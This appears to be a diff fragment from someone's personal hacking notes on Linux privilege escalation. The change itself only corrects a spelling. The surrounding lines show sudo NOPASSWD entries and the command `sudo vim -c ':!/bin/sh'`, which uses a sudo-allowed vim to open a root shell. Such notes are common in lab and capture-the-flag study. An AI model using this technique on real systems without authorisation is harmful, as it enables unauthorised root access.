meriksson-swe/hacking-notes/priviledge-escalation.md

     (root) NOPASSWD: /usr/sbin/apache2
     (root) NOPASSWD: /bin/more
 ```
-Try to see it there is a way of exploiting vim and sudo to get higher priviledges.
+Try to see it there is a way of exploiting vim and sudo to get higher privileges.
 Seaching for vim and then click on sudo will show you this command `sudo vim -c ':!/bin/sh'`, so let's try it out
 ``` bash
 $ sudo vim -c ':!/bin/sh'